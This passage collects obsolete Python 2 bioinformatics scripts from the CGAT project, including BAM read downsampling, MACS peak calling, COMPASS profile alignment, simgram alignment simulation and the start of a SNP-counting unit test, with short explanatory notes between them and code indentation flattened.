def buildBigwig( infile, outfile ):
pipeline_vitaminD.buildBigwig( infile, outfile )
@files_re( remapWithBowtie,
"(.*).bam",
r"\1.readstats" )
def buildBAMStats( infile, outfile ):
pipeline_vitaminD.buildBAMStats( infile, outfile )
def getMappedReads( infile ):
'''return number of reads mapped.
'''
for lines in open(infile,"r"):
data = lines[:-1].split("\t")
if data[1].startswith( "mapped"):
return int(data[0])
return
def getMinimumMappedReads( infiles ):
'''find the minimum number of mapped reads in infiles.'''
v = []
for infile in infiles:
x = getMappedReads( infile )
if x: v.append( x )
return min(v)
@follows( buildBAMStats )
@files_re( remapWithBowtie,
"(.*).bam",
(r"\1.bam", r"\1.readstats" ),
r"\1.normbam" )
def buildNormalizedBAM( infiles, outfile ):
    '''normalize a BAM file by downsampling to the minimum number of mapped reads across samples.'''
min_reads = getMinimumMappedReads( glob.glob("*.readstats") )
infile, statsfile = infiles
num_reads = getMappedReads( statsfile )
pysam_in = pysam.Samfile( infile, "rb" )
pysam_out = pysam.Samfile( outfile, "wb", template = pysam_in )
ninput, noutput = 0, 0
take = [1] * min_reads + [0] * (num_reads-min_reads)
random.shuffle( take )
# iterate over mapped reads
for read in pysam_in.fetch():
if take[ninput]:
pysam_out.write( read )
noutput += 1
ninput += 1
pysam_in.close()
pysam_out.close()
P.info( "buildNormalizedBam: %i input, %i output (%5.2f%%), should be %i" % (ninput, noutput, 100.0*noutput/ninput, min_reads ))
@files_re( buildNormalizedBAM,
"(.*).normbam",
r"\1.macs" )
def runMACS( infile, outfile ):
to_cluster = False
track = infile[:-len("normbam")]
try:
control = pipeline_vitaminD.getControl( track ) + ".bam"
except AssertionError:
return
statement = '''
macs -t %(infile)s -c %(control)s \
--name=%(outfile)s \
--format=bam --tsize=35 --bw=110 --mfold=8 --gsize=6000000 >& %(outfile)s'''
P.run( **dict( locals().items() + PARAMS.items() ) )
@follows( remapWithBowtie, buildBigwig, runMACS )
def full():
pass
if __name__== "__main__":
P.checkFiles( ("genome.fasta", "genome.idx" ) )
P.checkExecutables( ("liftOver",) )
sys.exit( P.main(sys.argv) )
```
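`buildNormalizedBAM` above equalizes library sizes by keeping a random subset of mapped reads so that every sample ends up with the same number as the smallest library: it builds a shuffled 0/1 mask with exactly `min_reads` ones and streams reads through it. A minimal standalone sketch of that sampling idea on toy data, independent of pysam:

```python
# Sketch of the subsampling trick used in buildNormalizedBAM: keep exactly
# `target` items out of a stream of known length `total` via a shuffled 0/1 mask.
import random

def subsample(items, total, target):
    """yield `target` randomly chosen items from an iterable of length `total`."""
    take = [1] * target + [0] * (total - target)
    random.shuffle(take)
    for flag, item in zip(take, items):
        if flag:
            yield item

# toy usage: downsample 100 read names to 10
reads = ["read%i" % i for i in range(100)]
kept = list(subsample(reads, total=len(reads), target=10))
assert len(kept) == 10
```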
#### File: cgat/obsolete/profile_vs_profile.py
```python
import os
import sys
import string
import re
import tempfile
import subprocess
import optparse
import time
import math
import shutil
#--------------------------------------------------------
#--------------------------------------------------------
#--------------------------------------------------------
# import of user libraries
#--------------------------------------------------------
import CGAT.Experiment as Experiment
import alignlib
from ProfileLibrary import ProfileLibrary
from ProfileLibraryCompass import ProfileLibraryCompass
def getKeys( plib, start = None, end = None ):
"""get keys of profiles to compare."""
k = plib.keys()
k.sort()
if not start: start = 0
if not end: end = len(k)
return k[max(0,start):min(end,len(k))], start, end
class CompassResult:
def __init__(self):
pass
class AlignatorCompass:
mAligner = "compass_db1Xdb2"
mReferenceLength = 1000000
def __init__(self):
self.mTempdir = tempfile.mkdtemp()
self.mFilenameQuery = self.mTempdir + "/query"
self.mFilenameSbjct = self.mTempdir + "/sbjct"
self.mFilenameQueryLength = self.mFilenameQuery + ".len"
self.mFilenameSbjctLength = self.mFilenameSbjct + ".len"
outfile = open( self.mFilenameQueryLength, "w" )
outfile.write( "%i\n" % self.mReferenceLength )
outfile.close()
outfile = open( self.mFilenameSbjctLength, "w" )
outfile.write( "%i\n" % self.mReferenceLength )
outfile.close()
def __del__( self ):
# shutil.rmtree( self.mTempdir ) did not work
for f in (self.mFilenameQuery, self.mFilenameSbjct,
self.mFilenameQueryLength, self.mFilenameSbjctLength ):
if os.path.exists(f):
os.remove(f)
os.rmdir( self.mTempdir )
def writeProfile( self, filename, profile, name = None ):
if name:
old_name = profile.getName()
profile.setName( name )
outfile = open( filename, "w" )
profile.save( outfile )
outfile.close()
if name: profile.setName( old_name )
    def align( self, query, sbjct, map_query2sbjct ):
"""align query and sbjct profile.
Result is stored in map_query2sbjct. In addition,
a method specific result object is returned.
"""
self.writeProfile( self.mFilenameQuery, query, "query" )
self.writeProfile( self.mFilenameSbjct, sbjct, "sbjct" )
statement = "%s -i %s -j %s" % (self.mAligner, self.mFilenameQuery, self.mFilenameSbjct )
s = subprocess.Popen( statement,
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
cwd = self.mTempdir,
close_fds = True)
(out, err) = s.communicate()
if s.returncode != 0:
raise "Error in running %s \n%s\n%s\nTemporary directory in %s" % (statement, err, out, self.mTempdir)
return self.parseResult( out, err, map_query2sbjct )
def addBlocks( self,
query_index, query_ali,
sbjct_index, sbjct_ali,
map_query2sbjct ):
""" parse alignment. From the COMPASS website:
CAPITAL letters: residues at positions aligned by COMPASS, i.e. at input alignment positions
with gap content < threshold of gap fraction (see above);
lower-case letters: residues at positions not used by COMPASS, i.e. at input alignment positions
with gap content >= threshold of gap fraction (see above);
'-' : gaps retained from original alignments at positions aligned by COMPASS, i.e. at positions
with gap content < threshold;
'.' : gaps retained from original alignments at positions not used by COMPASS, i.e. at positions
with gap content >= threshold;
'=' : gaps introduced by COMPASS in profile-profile alignment;
'~' : gaps introduced by COMPASS against positions that are not used in the construction of
profile-profile alignment (positions with gap content >= threshold);
"""
gap_chars = "=~"
for x in range( 0, len(query_ali) ):
# skip over gaps introduced by compass
if query_ali[x] in gap_chars:
sbjct_index += 1
continue
elif sbjct_ali[x] in gap_chars:
query_index += 1
continue
is_unaligned = False
# deal with unaligned positions - these can be matched up
if query_ali[x] in string.lowercase:
query_index += 1
is_unaligned = True
if sbjct_ali[x] in string.lowercase:
sbjct_index += 1
is_unaligned = True
if is_unaligned: continue
map_query2sbjct.addPair( query_index, sbjct_index )
query_index += 1
sbjct_index += 1
return query_index, sbjct_index
def parseResult( self, out, err, map_query2sbjct ):
"""parse result from compass."""
result = CompassResult()
map_query2sbjct.clear()
lines = out.split("\n")
result.mQuery, result.mSbjct = re.match( "Ali1:\s+(\S+)\s+Ali2:\s+(\S+)", lines[0]).groups()
result.mQueryLength, result.mQueryLengthFiltered, result.mSbjctLength, result.mSbjctLengthFiltered = \
map( int, re.match("length1=(\d+)\s+filtered_length1=(\d+)\s+length2=(\d+)\s+filtered_length2=(\d+)", lines[2] ).groups() )
result.mQueryNSeqs, result.mQueryNEffective, result.mSbjctNSeqs, result.mSbjctNEffective = \
map( float, re.match("Nseqs1=(\S+)\s+Neff1=(\S+)\s+Nseqs2=(\d+)\s+Neff2=(\S+)", lines[3] ).groups() )
result.score, result.mEvalue = \
map( float, re.match("Smith-Waterman score = (\S+)\s+Evalue = (\S+)", lines[4]).groups() )
x = 6
d, query_index, query_ali = re.split("\s+", lines[x] )
d, sbjct_index, sbjct_ali = re.split("\s+", lines[x+2] )
query_index, sbjct_index = self.addBlocks( int(query_index) - 1, query_ali,
int(sbjct_index) - 1, sbjct_ali,
map_query2sbjct )
for x in range( 11, len(lines), 5):
d, query_ali = re.split("\s+", lines[x] )
d, sbjct_ali = re.split("\s+", lines[x+2] )
query_index, sbjct_index = self.addBlocks( query_index, query_ali,
sbjct_index, sbjct_ali,
map_query2sbjct )
        map_query2sbjct.setScore( result.score )
        return result
#--------------------------------------------------------
#--------------------------------------------------------
#--------------------------------------------------------
# main part of script
#--------------------------------------------------------
if __name__ == "__main__":
#--------------------------------------------------------
# command line parsing options
parser = optparse.OptionParser( version = "%prog version: $Id: profile_vs_profile.py 2781 2009-09-10 11:33:14Z andreas $", usage = globals()["__doc__"])
parser.add_option("-q", "--query", dest="query", type="string",
help="query profile library." )
parser.add_option("-s", "--sbjct", dest="sbjct", type="string",
help="sbjct profile library." )
parser.add_option("-e", "--self-compare", dest="self_compare", action="store_true",
help="self-comparison. Only compare one direction." )
parser.add_option( "--query-start", dest="query_start", type="int",
help="start at xth entry of query." )
parser.add_option( "--query-end", dest="query_end", type="int",
help="stop at xth entry of query." )
parser.add_option( "--sbjct-start", dest="sbjct_start", type="int",
help="start at xth entry of sbjct." )
parser.add_option( "--sbjct-end", dest="sbjct_end", type="int",
help="stop at xth entry of sbjct." )
parser.add_option( "--filename-pairs", dest="filename_pairs", type="string",
help="align a list of pairs." )
parser.add_option( "--iterative-min-score", dest="iterative_min_score", type="float",
help="score threshold for iterative alignment." )
parser.add_option( "--alignment-mode", dest="alignment_mode", type="choice",
choices=("iterative-profile", "iterative-sequence", "compass"),
help="alignment mode." )
parser.set_defaults( query = None,
sbjct = None,
query_start = None,
query_end = None,
sbjct_start = None,
sbjct_end = None,
report_step = 100,
filename_pairs= None,
iterative_min_score = 40.0,
alignment_mode = "iterative-profile",
)
(options, args) = Experiment.Start( parser )
#--------------------------------------------------------
# main part of script
if not options.query:
print USAGE
raise "please supply a query."
if options.self_compare:
options.sbjct = options.query
if options.sbjct_end and options.query_start and \
options.sbjct_end < options.query_start:
if options.loglevel >= 1:
options.stdlog.write( "# subsections to compare are out of range for self comparison." )
Experiment.Stop()
sys.exit(0)
## adjust sbjct start to upper diagonal
if options.query_start and options.sbjct_start:
options.sbjct_start = max( options.query_start, options.sbjct_start )
else:
if not options.sbjct:
print USAGE
raise "please supply both a query and a sbjct."
if options.alignment_mode == "compass":
plib_query = ProfileLibraryCompass( options.query, "r" )
plib_sbjct = ProfileLibraryCompass( options.sbjct, "r" )
else:
plib_query = ProfileLibrary( options.query, "r" )
plib_sbjct = ProfileLibrary( options.sbjct, "r" )
if options.alignment_mode == "iterative-profile":
alignator1 = alignlib.makeAlignatorDPFull( alignlib.ALIGNMENT_LOCAL, -10.0, -2.0 )
alignator = alignlib.makeAlignatorIterative( alignator1, options.iterative_min_score )
elif options.alignment_mode == "iterative-sequence":
class AlignatorSequence:
def __init__(self):
self.mAlignator1 = alignlib.makeAlignatorDPFull( alignlib.ALIGNMENT_LOCAL, -10.0, -2.0 )
self.mAlignator = alignlib.makeAlignatorIterative( self.mAlignator1, options.iterative_min_score )
def align(self, query, sbjct, map_query2sbjct):
xrow = alignlib.makeSequence(query.asString())
xcol = alignlib.makeSequence(sbjct.asString())
self.mAlignator.align( xrow, xcol, map_query2sbjct)
alignator = AlignatorSequence()
elif options.alignment_mode == "compass":
alignator = AlignatorCompass()
else:
raise "unknown alignment mode %s" % options.alignment_mode
map_query2sbjct = alignlib.makeAlignmentVector()
def __align( query_profile, sbjct_profile ):
"""align two profiles and output the result."""
alignator.align( query_profile, sbjct_profile, map_query2sbjct )
blocks = alignlib.AlignedBlocks( map_query2sbjct )
if options.loglevel >= 3:
options.stdlog.write( str(map_query2sbjct) )
if map_query2sbjct.getLength() > 0:
options.stdout.write("%s\t%s\t%i\t%s\n" % (
query, sbjct, map_query2sbjct.getScore(), str(blocks) ) )
return 1
return 0
t_start = time.time()
def __report( noutput, ntotal ):
global t_start
if options.loglevel >= 1 and noutput % options.report_step == 0:
t = time.time() - t_start
options.stdlog.write( "# alignment: %5i (%5.2f)%%, query=%s, sbjct=%s, t=%i, <t>=%5.2fs, etf=%5.2fs, %5.2fh, et=%5.2fh\n" % \
(noutput, 100.0 * noutput / ntotal,
query, sbjct,
t,
float(t)/noutput,
float(t)/noutput * (ntotal-noutput),
float(t)/noutput * (ntotal-noutput) / 3600,
float(t)/noutput * ntotal / 3600) )
options.stdlog.flush()
options.stdout.flush()
noutput = 0
nempty = 0
npairs = 0
if options.filename_pairs:
pairs = []
infile = open( options.filename_pairs, "r" )
for line in infile:
if line[0] == "#": continue
query, sbjct = line[:-1].split("\t")[:2]
pairs.append( (query, sbjct) )
infile.close()
ntotal = len(pairs)
if options.loglevel >= 1:
options.stdlog.write( "# work: alignments=%i\n" % ( ntotal ) )
options.stdlog.flush()
last_query, last_sbjct = None, None
for query, sbjct in pairs:
if query != last_query:
query_profile = plib_query.getProfile( query )
last_query = query
if sbjct != last_sbjct:
                sbjct_profile = plib_sbjct.getProfile( sbjct )
last_sbjct = sbjct
npairs += 1
if __align( query_profile, sbjct_profile ):
noutput += 1
else:
nempty += 1
__report( npairs, ntotal )
else:
query_keys, query_start, query_end = getKeys( plib_query, options.query_start, options.query_end )
sbjct_keys, sbjct_start, sbjct_end = getKeys( plib_sbjct, options.sbjct_start, options.sbjct_end )
ntotal = len(query_keys) * len(sbjct_keys)
## subtract half-diagonal for self-comparisons. If query_end is smaller than
## sbjct_start, the full square is computed
if options.self_compare:
d = max( query_end - sbjct_start, 0 )
ntotal -= d * d / 2
if options.loglevel >= 1:
options.stdlog.write( "# work: queries=%i, sbjcts=%i, alignments=%i\n" % (len(query_keys), len(sbjct_keys), ntotal ) )
options.stdlog.flush()
for query in query_keys:
query_profile = plib_query.getProfile( query )
for sbjct in sbjct_keys:
if options.self_compare and query > sbjct: continue
sbjct_profile = plib_sbjct.getProfile( sbjct )
npairs += 1
if __align( query_profile, sbjct_profile ):
noutput += 1
else:
nempty += 1
__report( npairs, ntotal )
break
break
if options.loglevel >= 1:
t = time.time() - t_start
options.stdlog.write( "# alignment: %5i (%5.2f)%%, t=%is, t=%ih\n" %\
(noutput, 100.0 * noutput / ntotal,
t, t / 3600.0 ) )
if options.loglevel >= 1:
options.stdlog.write("# ninput=%i, noutput=%i, nempty=%i\n" % (ntotal, noutput, nempty) )
#--------------------------------------------------------
# general cleaning up
Experiment.Stop()
```
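`AlignatorCompass.addBlocks` above converts the two gapped rows of a COMPASS alignment into residue index pairs: a gap character advances only the opposite index, and lower-case (unused) positions advance their own index without emitting a pair. A simplified, self-contained sketch of that bookkeeping, which returns a plain list of `(query, sbjct)` tuples instead of filling an alignlib alignment and, unlike the script, treats `-`, `=` and `~` uniformly as gaps:

```python
# Simplified version of the addBlocks bookkeeping: turn two gapped alignment
# rows into (query_index, sbjct_index) pairs of aligned residues.
def aligned_pairs(query_ali, sbjct_ali, query_index=0, sbjct_index=0, gap_chars="-=~"):
    pairs = []
    for q, s in zip(query_ali, sbjct_ali):
        if q in gap_chars:          # gap in query row: only the sbjct residue advances
            sbjct_index += 1
            continue
        if s in gap_chars:          # gap in sbjct row: only the query residue advances
            query_index += 1
            continue
        unaligned = False
        if q.islower():             # position not used by COMPASS
            query_index += 1
            unaligned = True
        if s.islower():
            sbjct_index += 1
            unaligned = True
        if unaligned:
            continue
        pairs.append((query_index, sbjct_index))
        query_index += 1
        sbjct_index += 1
    return pairs

print(aligned_pairs("ACD-EF", "AC-GEF"))
# [(0, 0), (1, 1), (3, 3), (4, 4)]
```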
#### File: cgat/obsolete/simgram.py
```python
import os
import sys
import string
import re
import tempfile
import subprocess
import optparse
import time
import math
import shutil
import random
from types import *
USAGE = """python simgram.py [OPTIONS] < mali.in > out
Simulate alignments using simgram
"""
import CGAT.Experiment as Experiment
import CGAT.Mali as Mali
import CGAT.Genomics as Genomics
import CGAT.TreeTools as TreeTools
# imports for xrate computation
from XGram.Generator.Prebuilt import Codons
from XGram.Model import Annotation
import XGram.Run
from XGram.Generator.Prebuilt import DNA
import Bio.Data.CodonTable
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return str(self.message)
def _get_message(self, message): return self._message
def _set_message(self, message): self._message = message
message = property(_get_message, _set_message)
class ParsingError(Error):
"""Exception raised for errors while parsing
Attributes:
message -- explanation of the error
"""
def __init__(self, message, line):
self.message = message + " at line " + line
class UsageError(Error):
"""Exception raised for errors while starting
Attributes:
message -- explanation of the error
"""
def __init__(self, message):
self.message = message
class SimgramResult:
def __init__(self):
self.mStockholm = None
self.mMali = Mali.Mali()
class WrapperSimgram:
mExecutable = "simgram"
def __init__(self):
pass
##------------------------------------------------------------------------
def run( self,
grammar,
tree = None,
dump = 0,
test = False,
options = {} ):
self.mTempdir = tempfile.mkdtemp()
self.mFilenameGrammar = "grammar.eg"
self.mFilenameTree = "tree.nh"
self.mFilenameOutput = None
self.mWarnings = []
if test:
print "# temporary directory is %s" % self.mTempdir
outfile = open(self.mTempdir + "/" + self.mFilenameGrammar, "w")
outfile.write( grammar.getGrammar() )
outfile.close()
if tree:
outfile = open(self.mTempdir + "/" + self.mFilenameTree, "w" )
## check what kind of tree is given.
if type(tree) == StringType:
t = tree.strip()
if t[0] == "(" and t[-1] in ");":
outfile.write("%s\n" % t)
else:
nexus = TreeTools.Newick2Nexus( open(tree, "r" ) )
t = nexus.trees[0]
outfile.write("%s\n" % TreeTools.Tree2Newick(t))
outfile.close()
        # use our own random seed: the time-based default is not safe if simgram
        # is called in quick succession.
        # Are there any restrictions on seeds? Ian uses an even number.
statement = "%s -rndseed %i -g %s -t %s" % (self.mExecutable,
random.randint(0, 4294967296),
self.mFilenameGrammar,
self.mFilenameTree )
s = subprocess.Popen( statement,
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
cwd = self.mTempdir,
close_fds = True)
(out, err) = s.communicate()
if s.returncode != 0:
raise UsageError, "Error in running %s \n%s\n%s\nTemporary directory in %s" % (self.mExecutable, err, out, self.mTempdir)
if dump:
print "# stdout output of %s:\n%s\n######################################" % (self.mExecutable, out)
if not test:
shutil.rmtree( self.mTempdir )
return self.parseOutput( out.split("\n") )
def parseOutput( self, lines ):
"""parse stdout output from simgram."""
result = SimgramResult()
result.mStockholm = lines
result.mMali.readFromFile( lines, format="stockholm" )
return result
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
def writeModel( grammar, section, options):
"""write a model to output file."""
if section in options.write or "all" in options.write:
outfile = open( options.output_pattern % section, "w" )
outfile.write( "%s\n" % grammar.getGrammar())
outfile.close()
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
def countSites( model ):
"""count number of expected synonymous/nonsynonymous sites in a grammar.
"""
## number of synonymous/non-synonymous sites
n, s = 0.0, 0.0
xpi = model.evaluateTerminalFrequencies()[('COD0', 'COD1', 'COD2')]
pi = {}
for codon, f in xpi.items():
pi["".join(codon).upper()] = f
## translate pi and the matrix to codons
for key, value in pi.items():
del pi[key]
pi["".join(key).upper()] = value
for codon, freq in pi.items():
try:
degeneracy = Genomics.GetDegeneracy( codon )
except KeyError:
continue
for x in range(1,4):
d = (degeneracy[x] - 1.0 ) / 3.0
s += freq * d
n += freq * (1.0-d)
## if degeneracy[x] > 1:
## s += freq
## else:
## n += freq
assert( float("%5.2f" % (n + s)) == 3.0 )
## print s / (n+s)
## n = 184.9
## s = 76.1
## t = n + s
## n /= t
## s /= t
## print s / (n+s)
return n, s
if __name__ == "__main__":
parser = optparse.OptionParser( version = "%prog version: $Id: simgram.py 2781 2009-09-10 11:33:14Z andreas $" )
parser.add_option( "-m", "--model", dest="model", type="choice",
choices=( "custom", "sn", "akaksgc", "K80", "f3x4-four" ),
help="grammar to use for simulation." )
parser.add_option("-i", "--input-format", dest="input_format", type="choice",
choices=("plain", "fasta", "clustal", "stockholm", "phylip" ),
help="input format of multiple alignment" )
parser.add_option("-o", "--output-format", dest="output_format", type="choice",
choices=("plain", "fasta", "clustal", "stockholm", "phylip" ),
help="output format of multiple alignment" )
parser.add_option( "--set-omega", dest="omega", type="float",
help="set omega (non-synonymous/synonymous rate ratio).")
parser.add_option( "--set-kappa", dest="kappa", type="float",
help="set kappa (transition/transversion ratio).")
parser.add_option( "--set-ds", dest="ds", type="float",
help="set divergence.")
parser.add_option("-w", "--write", dest="write", type="choice", action="append",
choices=("input_fixed", "trained_fixed", "input_variable", "trained_variable", "all" ),
help="output sections to write." )
parser.add_option( "--output-pattern", dest="output_pattern", type="string",
help="output pattern for output files." )
parser.add_option("--insert-frequencies", dest="insert_frequencies", type="string",
help="insert frequencies from a multiple alignment." )
parser.add_option("--uniform-frequencies", dest="insert_frequencies", action="store_false",
help="use uniform codon frequencies." )
parser.add_option( "--test", dest="test", action="store_true",
help="run a test." )
parser.add_option( "--dump", dest="dump", action="store_true",
help="dump output." )
parser.add_option( "--num-replicates", dest="num_replicates", type="int",
help="number of replicates to output." )
parser.add_option( "--length", dest="length", type="int",
help="length of simulated alignment. Set to 0 (default) for variable length." )
parser.add_option( "--remove-stop-codons", dest="remove_stop_codons", action="store_true",
help="remove positions in mali with stop-codons." )
parser.set_defaults(
input_format="fasta",
output_format="fasta",
model = "akaksgc",
omega = None,
kappa = None,
ds = None,
dump = False,
test = False,
insert_frequencies = None,
write = [],
output_pattern = "%s.eg",
value_format = "%6.4f",
debug = False,
fix_rates = None,
filename_grammar = None,
num_replicates = 1,
remove_stop_codons = False,
length = 0,
)
(options, args) = Experiment.Start( parser )
if options.fix_rates: options.fix_rates = map( float, options.fix_rates.split(",") )
if options.loglevel >= 1:
if options.omega:
o_omega = "%6.4f" % options.omega
else:
o_omega = "na"
if options.kappa:
o_kappa = "%6.4f" % options.kappa
else:
o_kappa = "na"
if options.ds:
o_ds = "%6.4f" % options.ds
else:
o_ds = "na"
options.stdlog.write("# input parameters: model=%s, ds=%s, omega=%s, kappa=%s\n" % ( options.model, o_ds, o_omega, o_kappa) )
## load a grammar
if options.model in ( "sn" , "akaksgc", "f3x4-four" ):
if options.model in ("sn", ):
infile = open(XGram.PATH_DATA + "/sn.eg", "r")
input_model = XGram.Parser.parseGrammar( infile.readlines() )
elif options.model in ( "akaksgc", ):
infile = open(XGram.PATH_DATA + "/akaksgc.eg", "r")
input_model = XGram.Parser.parseGrammar( infile.readlines() )
elif options.model in ( "f3x4-four", ):
input_model = Codons.buildCodonML(codon_model = options.model,
explicit_extension = True,
fix_kappa = options.kappa == None,
fix_omega = options.omega == None )
## set codon usage frequencies
if options.insert_frequencies:
mali = Mali.Mali()
mali.readFromFile( open(options.insert_frequencies, "r"),
format = options.input_format )
if mali.getLength() == 0:
raise "refusing to process empty alignment."
frequencies = Codons.getFrequenciesPerCodonPosition( map( lambda x: x.mString, mali.values() ))
# build a dummy grammar to insert frequencies
dummy_grammar = XGram.Model.Grammar()
for x in range(0,3):
params = []
for a in ('A', 'C', 'G', 'T'):
params.append( ("p%s%i" % (a.lower(), x), frequencies[x][a]) )
dummy_grammar.addVariable( params )
input_model.mGrammar.copyParameters( dummy_grammar,
ignore_missing = True)
## count the number of synonymous and non-synonymous sites
if options.omega or options.kappa:
n, s = countSites( input_model )
ps = s / (n + s )
if options.omega:
branchlength = 3 * options.ds * ( ps + options.omega * (1 - ps ) )
else:
branchlength = 3 * options.ds
if options.loglevel >= 1:
options.stdlog.write("# derived parameters: n=%6.4f, s=%6.4f, ps=%6.4f, branchlength=%6.4f\n" % (n, s, ps, branchlength ) )
if options.kappa and options.omega:
if options.model in ("akaksgc", ) :
n /= 3.0
s /= 3.0
rni = branchlength * n * options.omega * options.kappa
rsi = branchlength * s * options.kappa
rnv = branchlength * n * options.omega
rsv = branchlength * s
input_model.mGrammar.setParameter( "Rsi", rsi )
input_model.mGrammar.setParameter( "Rni", rni )
input_model.mGrammar.setParameter( "Rnv", rnv )
input_model.mGrammar.setParameter( "Rsv", rsv )
if options.loglevel >= 1:
options.stdlog.write("# computed parameters: rsi=%6.4f, rsv=%6.4f, rni=%6.4f, rnv=%6.4f\n" % (rsi, rsv, rni, rnv) )
elif options.model in ("f3x4-four", ):
# branchlength = 3 * options.ds
rni = 25.0 * branchlength * options.omega * options.kappa
rsi = 25.0 * branchlength * options.kappa
rnv = 25.0 * branchlength * options.omega
rsv = 25.0 * branchlength
input_model.mGrammar.setParameter( "Rsi", rsi )
input_model.mGrammar.setParameter( "Rni", rni )
input_model.mGrammar.setParameter( "Rnv", rnv )
input_model.mGrammar.setParameter( "Rsv", rsv )
if options.loglevel >= 1:
options.stdlog.write("# computed parameters: rsi=%6.4f, rsv=%6.4f, rni=%6.4f, rnv=%6.4f\n" % (rsi, rsv, rni, rnv) )
elif options.kappa:
## without omega, we have a plain nucleotide model.
## Because we work in codon space,
                ## the branch length needs to be (20 * 20) / (4 * 4) = 25 times as long
alpha = 25.0 * branchlength * options.kappa / (1.0 + 2.0 * options.kappa )
beta = 25.0 * branchlength / (1.0 + 2.0 * options.kappa )
input_model.mGrammar.setParameter( "kappa", alpha )
input_model.mGrammar.setParameter( "not_kappa", beta )
elif options.omega:
                ## without kappa, we have a plain nucleotide model. Because we work in codon space,
                ## the branch length needs to be (20 * 20) / (4 * 4) = 25 times as long
omega = 25.0 * options.ds
not_omega = 25.0 * options.ds * options.omega
input_model.mGrammar.setParameter( "omega", omega )
input_model.mGrammar.setParameter( "not_omega", not_omega )
elif options.model in ("K80" ):
if not (options.omega == None or options.omega == 1.0):
raise "can only accept 1.0 for omega using the kimura model."
if options.model == "K80":
input_model = DNA.buildModel( substitution_model = "k80",
explicit_extension = True )
alpha = options.ds * options.kappa / (1.0 + 2.0 * options.kappa )
beta = options.ds / (1.0 + 2.0 * options.kappa )
if options.loglevel >= 1:
options.stdlog.write("# computed parameters: alpha=%6.4f, beta=%6.4f\n" % (alpha, beta) )
input_model.mGrammar.setParameter( "alpha", alpha )
input_model.mGrammar.setParameter( "beta", beta )
## set ext and not_ext to allow for long chains
input_model.mGrammar.setParameter( "ext", "0.999" )
input_model.mGrammar.setParameter( "not_ext", "0.001" )
writeModel( input_model, "input", options )
simgram = WrapperSimgram()
noutput = 0
last_mali = None
while noutput < options.num_replicates:
result = simgram.run( input_model, tree = "(seq1:1.0)seq2;",
dump = options.dump,
test = options.test )
mali = result.mMali
if options.remove_stop_codons:
mali.removePattern( lambda x: x.upper() in ("TAG", "TAA", "TGA"),
allowed_matches = 0,
minimum_matches = 1,
frame = 3 )
width = mali.getWidth()
mali.truncate( 0, 3 * int(math.floor( width / 3.0 ) ) )
if options.loglevel >= 1:
options.stdlog.write("# received mali: %i sequences, %i columns.\n" % (mali.getLength(), mali.getWidth()))
if last_mali:
for key, value in last_mali.items():
mali.getEntry(key).mString += value.mString
if options.loglevel >= 1:
options.stdlog.write("# cumulative mali: %i sequences, %i columns.\n" % (mali.getLength(), mali.getWidth()))
output = True
if options.length:
if mali.getWidth() > options.length:
mali.truncate( 0, options.length )
output = True
elif mali.getWidth() < options.length:
output = False
if output:
noutput += 1
mali.writeToFile( sys.stdout, format = options.output_format )
last_mali = mali
Experiment.Stop()
```
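For the `akaksgc` model, the main block above maps the user-level parameters `ds`, `omega` and `kappa` to the grammar's rate parameters: the codon branch length is `3 * ds * (ps + omega * (1 - ps))`, where `ps` is the synonymous-site fraction derived from `countSites()`, and the four rates are products of branch length, per-position site counts, `omega` and `kappa`. A small worked sketch of that arithmetic, with hypothetical site counts standing in for `countSites()` output:

```python
# Worked example of the akaksgc rate arithmetic from the main block; the site
# counts n and s are made-up values standing in for countSites(input_model).
def akaksgc_rates(ds, omega, kappa, n, s):
    ps = s / (n + s)                                  # fraction of synonymous sites
    branchlength = 3 * ds * (ps + omega * (1 - ps))   # codon branch length
    n, s = n / 3.0, s / 3.0                           # per codon position
    return {"Rsi": branchlength * s * kappa,
            "Rni": branchlength * n * omega * kappa,
            "Rsv": branchlength * s,
            "Rnv": branchlength * n * omega}

print(akaksgc_rates(ds=0.1, omega=0.3, kappa=2.0, n=2.3, s=0.7))
```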
#### File: cgat/obsolete/snp2counts_test.py
```python
import sys
import os
import shutil
import optparse
import random
import math
import unittest
import tempfile
import snp2counts
import CGAT.GTF as GTF
import CGAT.Genomics as Genomics
import CGAT.IndexedFasta as IndexedFasta
class getCDSPositionTestPos(unittest.TestCase):
def setUp(self):
self.mExons = []
self.mSplitCodonsNext = {}
self.mSplitCodonsPrev = {}
self.mSpliceSize = 4
self.mExonSize = 100
self.mIntronSize = 900
self.strand = "+"
self.mNExons = 9
self.mOffset = 1000
length = 0
self.frame = 0
self.mIncrement = self.mIntronSize + self.mExonSize
seq = list("123" * int((self.mNExons * self.mExonSize) / 3))
exon_id = 0
start = self.mOffset
for x in range(self.mNExons):
e = GTF.Entry()
e.contig, e.strand, e.gene_id, e.transcript_id = "chr1", "+", "gene1", "trans1"
e.start, e.end = start, start + self.mExonSize
e.frame = (3 - (length % 3)) % 3
length += e.end - e.start
self.mExons.append(e)
if e.frame != 0:
for y in range(0, e.frame):
self.mSplitCodonsPrev[start + y] = start - self.mIntronSize
for y in range(0, 3 - e.frame):
self.mSplitCodonsNext[
start - self.mIntronSize - y - 1] = start
exon_id += 1
if exon_id < self.mNExons:
p = exon_id * self.mExonSize + self.mIntronSize * (exon_id - 1)
seq[p:p] = list("AG")
seq[p:p] = list("T" * (self.mIntronSize - 4))
seq[p:p] = list("GT")
start += self.mIncrement
# print str(e)
# print self.mSplitCodonsNext
# print self.mSplitCodonsPrev
seq[0:0] = "C" * self.mOffset
seq.append("G" * self.mOffset)
tmpfile = tempfile.NamedTemporaryFile()
tmpfile.close()
seq = "".join(seq)
self.mSequence = seq
self.contigSize = len(seq)
IndexedFasta.createDatabase(tmpfile.name, iter([("chr1", seq), ]))
self.mFasta = IndexedFasta.IndexedFasta(tmpfile.name)
def tearDown(self):
os.unlink(self.mFasta.getDatabaseName())
os.unlink(self.mFasta.getDatabaseName()[:-len(".fasta")] + ".idx")
def toRange(self, x, y):
'''convert snp to positive strand base.'''
if self.strand == "+":
return x, y
else:
return self.contigSize - y, self.contigSize - x
def testCodingSNPs(self):
length = 0
framed_length = (3 - self.frame) % 3
phase = (3 - self.frame) % 3
if self.strand == "+":
motif = "123"
else:
motif = "321"
for x in range(self.mOffset, self.contigSize - self.mOffset, self.mIncrement):
